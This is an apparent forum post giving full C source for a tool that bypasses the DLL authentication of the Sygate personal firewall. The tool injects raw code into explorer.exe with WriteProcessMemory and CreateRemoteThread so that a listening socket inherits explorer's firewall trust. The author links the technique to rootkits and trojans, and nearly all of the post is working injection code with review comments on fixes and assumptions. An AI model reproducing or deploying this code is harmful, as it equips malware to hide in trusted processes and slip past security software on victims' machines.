Bypassing DLL authentication in Sygate (and similar personal firewalls)

  akcom

Sygate uses a fairly effective method that limits injecting a DLL into a trusted process, a popular technique for rootkits and trojans alike. This is just some example code to bypass Sygate's DLL authentication; it is very simple, but it is only meant to get the concept across. It works by copying a self-contained function into a remote process (in this example, explorer.exe) with WriteProcessMemory and then running it with CreateRemoteThread. The thread then sets up a listening socket. Because no DLL is ever loaded into the target — only raw code and a parameter block are written into its address space — a check that only vets the DLLs a trusted process loads should never fire, and the listener should inherit explorer.exe's firewall trust. Note that the injected function must not reference anything outside itself (no string literals, globals or direct API calls, since those addresses do not exist in the target), which is why every string it needs and the two kernel32 entry points are passed in a struct.

I'm not a big fan of commenting, so if you have any questions, just point me to the line number and I will explain it.

#define WIN32_LEAN_AND_MEAN
#include
#include
#include
#include
#include

/*
 * Function-pointer types for the ws2_32 and kernel32 entry points that the
 * injected ThreadProc calls. ThreadProc is copied into another process as raw
 * bytes, so it cannot use this executable's import table; instead it resolves
 * each export by name through GetProcAddress at run time and calls through
 * pointers of these types. The signatures mirror the Winsock/Win32 prototypes.
 */
typedef int (WSAAPI *LPWSAStartup)( IN WORD wVersionRequested, OUT LPWSADATA lpWSAData );
typedef SOCKET (WSAAPI *LPsocket)( IN int af, IN int type, IN int protocol );
typedef int (WSAAPI *LPbind)( IN SOCKET s, IN const struct sockaddr FAR * name, IN int namelen );
typedef int (WSAAPI *LPlisten)( IN SOCKET s, IN int backlog );
typedef SOCKET (WSAAPI *LPaccept)( IN SOCKET s, OUT struct sockaddr FAR * addr, IN OUT int FAR * addrlen );
typedef int (WSAAPI *LPclosesocket)( IN SOCKET s );
typedef int (WSAAPI *LPsend)( IN SOCKET s, IN const char FAR * buf, IN int len, IN int flags );
/* The two kernel32 exports the remote thread bootstraps from (filled in by main). */
typedef HMODULE (WINAPI *LPLoadLibrary)( IN LPCSTR lpLibFileName );
typedef FARPROC (WINAPI *LPGetProcAddress)( IN HMODULE hModule, IN LPCSTR lpProcName );


/*
 * Parameter block copied into the target process alongside ThreadProc.
 * ThreadProc runs inside explorer.exe, where none of this executable's string
 * literals or imports exist at the same addresses, so every name it needs is
 * carried here as an inline character array, and the two kernel32 entry points
 * it bootstraps from are passed as already-resolved pointers (see main).
 * Field order must match the aggregate initializer of `info` below.
 * NOTE(review): `_INJINFO` (underscore + capital) is a reserved identifier;
 * harmless in practice on MSVC but worth renaming.
 */
typedef struct _INJINFO
{
char c_Lib[16];                /* DLL to load in the target ("ws2_32.dll") */
char c_WSAStartup[12];         /* ws2_32 export names, resolved via GetProcAddr */
char c_Socket[8];
char c_Bind[8];
char c_Listen[8];
char c_Accept[8];
char c_CloseSocket[16];
char c_send[8];
char c_data[45];               /* payload sent to each client; ThreadProc sends all 45 bytes,
                                  so the zero tail left by static initialization goes on the wire too */
LPLoadLibrary LoadLib;         /* LoadLibraryA as resolved in the injector; only valid in the
                                  target if kernel32 is mapped at the same base there */
LPGetProcAddress GetProcAddr;  /* GetProcAddress, same caveat */
} INJINFO, *PINJINFO;

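/*
 * Body that main copies byte-for-byte into the target process and starts with
 * CreateRemoteThread. It must therefore not touch anything that exists only in
 * the injector's address space: no string literals, no globals, no direct
 * calls into the CRT or Win32 (each would be a relocation into a mapping that
 * is not present at that address in explorer.exe). The only things it may use
 * are the strings and the two kernel32 function pointers that main copies
 * alongside it in the INJINFO block pointed to by lpParams.
 *
 * lpParams: remote address of the copied INJINFO. Its LoadLib/GetProcAddr
 *           members are kernel32 exports resolved in the injector and are only
 *           valid here if kernel32 is mapped at the same base in both
 *           processes (same boot session, same bitness).
 * Returns 0 once the accept loop ends, 1 if resolving an import or setting up
 * the listener fails. Bailing out quietly is preferable to calling a NULL
 * pointer and taking explorer.exe down with an access violation.
 */
static DWORD WINAPI ThreadProc( LPVOID lpParams )
{
	PINJINFO info = (PINJINFO)lpParams;
	if ( info == NULL || info->LoadLib == NULL || info->GetProcAddr == NULL )
		return 1;

	HMODULE hLib = info->LoadLib( info->c_Lib );
	if ( hLib == NULL )
		return 1;

	/* Resolve every ws2_32 export by name. Any NULL here used to be called
	 * blindly below, which would crash the host process. */
	LPWSAStartup wsastartup = (LPWSAStartup)info->GetProcAddr( hLib, info->c_WSAStartup );
	LPsocket wsasocket = (LPsocket)info->GetProcAddr( hLib, info->c_Socket );
	LPbind wsabind = (LPbind)info->GetProcAddr( hLib, info->c_Bind );
	LPlisten wsalisten = (LPlisten)info->GetProcAddr( hLib, info->c_Listen );
	LPaccept wsaaccept = (LPaccept)info->GetProcAddr( hLib, info->c_Accept );
	LPclosesocket wsaclosesocket = (LPclosesocket)info->GetProcAddr( hLib, info->c_CloseSocket );
	LPsend wsasend = (LPsend)info->GetProcAddr( hLib, info->c_send );
	if ( wsastartup == NULL || wsasocket == NULL || wsabind == NULL || wsalisten == NULL
	  || wsaaccept == NULL || wsaclosesocket == NULL || wsasend == NULL )
		return 1;

	/* Fields are assigned one by one rather than with "= {0}": a zero
	 * initializer may be compiled into a memset call, which would be an
	 * external reference this code cannot have. */
	SOCKADDR_IN sAddr;
	sAddr.sin_family = AF_INET;
	sAddr.sin_addr.s_addr = INADDR_ANY;
	/* Stored as-is, i.e. already in network byte order: on the wire the port
	 * is 0xDEAD only when read big-endian, so the host-order port actually
	 * bound is 0xADDE (44510). htons() is a ws2_32 export and cannot be
	 * called directly from here. */
	sAddr.sin_port = 0xDEAD;

	WSADATA wsa;
	if ( wsastartup( 0x0202, &wsa ) != 0 )
		return 1;

	SOCKET ServerSocket = wsasocket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
	/* socket()/accept() report failure as INVALID_SOCKET; SOCKET_ERROR (-1)
	 * compares equal to it after the usual conversion, which is the
	 * convention this file already uses. */
	if ( ServerSocket == SOCKET_ERROR )
		return 1;

	if ( wsabind( ServerSocket, (LPSOCKADDR)&sAddr, sizeof(sAddr) ) != 0
	  || wsalisten( ServerSocket, 5 ) != 0 )
	{
		wsaclosesocket( ServerSocket );
		return 1;
	}

	/* Serve until accept() fails. Every client receives the whole c_data
	 * buffer and is then closed; previously one socket handle leaked per
	 * connection inside the host process. */
	for (;;)
	{
		SOCKET cli = wsaaccept( ServerSocket, NULL, NULL );
		if ( cli == SOCKET_ERROR )
			break;
		wsasend( cli, info->c_data, sizeof(info->c_data), 0 );
		wsaclosesocket( cli );
	}

	wsaclosesocket( ServerSocket );
	return 0;
}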

/*
 * Empty marker placed directly after ThreadProc in the source. main uses its
 * address to compute how many bytes of ThreadProc to copy into the target.
 * __declspec(naked) suppresses the compiler's prologue/epilogue so the body
 * is nothing but the label. NOTE(review): this only works if the linker keeps
 * the two functions adjacent and in source order; incremental linking (jump
 * thunks), /GS stack cookies or function reordering all break the size
 * computation — build without them and compare the size main prints against
 * a disassembly.
 */
static void __declspec( naked ) end_proc()
{

}

/*
 * Parameter block handed to the remote thread. Only the string fields are set
 * here; LoadLib/GetProcAddr are filled in by main at run time because they are
 * resolved addresses, not constants. Each array is larger than its literal, so
 * the remainder is zero-filled by aggregate initialization — this matters for
 * c_data, since ThreadProc sends the full 45-byte buffer, not just the string.
 */
INJINFO info =
{
"ws2_32.dll",
"WSAStartup",
"socket",
"bind",
"listen",
"accept",
"closesocket",
"send",
"slutted",      /* banner sent to each client (plus 37 zero bytes of padding) */
NULL,
NULL
};

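/*
 * Injector: copies ThreadProc's machine code and the INJINFO parameter block
 * into explorer.exe and runs them with CreateRemoteThread. Because no DLL is
 * loaded into the target, a firewall that only vets the DLLs a trusted process
 * loads never sees the listener.
 *
 * Assumptions this relies on (none of them can be checked at run time):
 *  - kernel32.dll is mapped at the same base in both processes, so the
 *    LoadLibraryA/GetProcAddress pointers resolved here are valid there;
 *  - injector and explorer.exe have the same bitness;
 *  - ThreadProc is laid out contiguously with end_proc directly after it
 *    (breaks with incremental linking, /GS or function reordering; the size
 *    guard below only catches the case where the order is inverted);
 *  - the caller may open explorer.exe with PROCESS_ALL_ACCESS.
 * Returns 0 on success, 1 on any failure (the original returned 0 on error).
 */
int main(int argc, char* argv[])
{
	(void)argc;
	(void)argv;

	HMODULE hLib = LoadLibrary( "kernel32.dll" );
	if ( hLib == NULL )
	{
		printf( "error loading kernel32 (%lu)\n", GetLastError() );
		return 1;
	}

	info.LoadLib = (LPLoadLibrary)GetProcAddress( hLib, "LoadLibraryA" );
	info.GetProcAddr = (LPGetProcAddress)GetProcAddress( hLib, "GetProcAddress" );
	if ( info.LoadLib == NULL || info.GetProcAddr == NULL )
	{
		printf( "error resolving kernel32 exports\n" );
		return 1;
	}

	/* Locate explorer.exe through its taskbar window. Without the check,
	 * a missing window left dwPID uninitialized and OpenProcess was called
	 * on garbage. */
	DWORD dwPID = 0;
	HWND hTray = FindWindow( "Shell_TrayWnd", NULL );
	if ( hTray == NULL || GetWindowThreadProcessId( hTray, &dwPID ) == 0 || dwPID == 0 )
	{
		printf( "error locating explorer.exe\n" );
		return 1;
	}
	printf( "explorer pid: 0x%lx\n", dwPID );

	HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );
	if ( hProcess == NULL )
	{
		printf( "error opening process (%lu)\n", GetLastError() );
		return 1;
	}

	/* Everything below is released at cleanup; declared up front so the
	 * gotos do not jump past an initialization. */
	int rc = 1;
	LPVOID lpProc = NULL;
	LPVOID lpParams = NULL;
	HANDLE hThread = NULL;
	DWORD ProcSize = 0;
	SIZE_T dwWritten = 0;
	DWORD ThreadID = 0;

	/* Bytes of code to copy = distance to the marker function. Subtracting
	 * char pointers avoids truncating the addresses to 32 bits the way the
	 * former (DWORD) casts did; a marker placed before ThreadProc would
	 * otherwise yield a huge size. */
	if ( (const char *)end_proc <= (const char *)ThreadProc )
	{
		printf( "end_proc is not placed after ThreadProc; cannot size the code\n" );
		goto cleanup;
	}
	ProcSize = (DWORD)( (const char *)end_proc - (const char *)ThreadProc );
	printf( "proc size: %lu\n", ProcSize );

	lpProc = VirtualAllocEx( hProcess, NULL, ProcSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	lpParams = VirtualAllocEx( hProcess, NULL, sizeof( info ), MEM_COMMIT, PAGE_READWRITE );
	if ( lpProc == NULL || lpParams == NULL )
	{
		printf( "error allocating mem (%lu)\n", GetLastError() );
		goto cleanup;
	}
	printf( "memory allocated at %p and %p\n", lpProc, lpParams );

	/* Both writes used to be unchecked; a short write here means the remote
	 * thread would start on a truncated function. */
	if ( !WriteProcessMemory( hProcess, lpProc, (const void *)ThreadProc, ProcSize, &dwWritten )
	  || dwWritten != ProcSize )
	{
		printf( "error writing code (%lu)\n", GetLastError() );
		goto cleanup;
	}
	if ( !WriteProcessMemory( hProcess, lpParams, &info, sizeof( info ), &dwWritten )
	  || dwWritten != sizeof( info ) )
	{
		printf( "error writing params (%lu)\n", GetLastError() );
		goto cleanup;
	}
	printf( "memory written\n" );

	hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpProc, lpParams, 0, &ThreadID );
	if ( hThread == NULL )
	{
		printf( "error creating thread (%lu)\n", GetLastError() );
		goto cleanup;
	}

	/* The remote code and its parameters must stay mapped for as long as the
	 * thread runs, so wait for it to exit before releasing anything. */
	WaitForSingleObject( hThread, INFINITE );
	rc = 0;

cleanup:
	/* MEM_RELEASE with size 0 returns the whole region; the previous
	 * MEM_DECOMMIT left the address range reserved in the target. */
	if ( lpProc != NULL )
		VirtualFreeEx( hProcess, lpProc, 0, MEM_RELEASE );
	if ( lpParams != NULL )
		VirtualFreeEx( hProcess, lpParams, 0, MEM_RELEASE );
	if ( hThread != NULL )
		CloseHandle( hThread );
	CloseHandle( hProcess );  /* was never closed before */

	printf( "done\n" );
	return rc;
}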
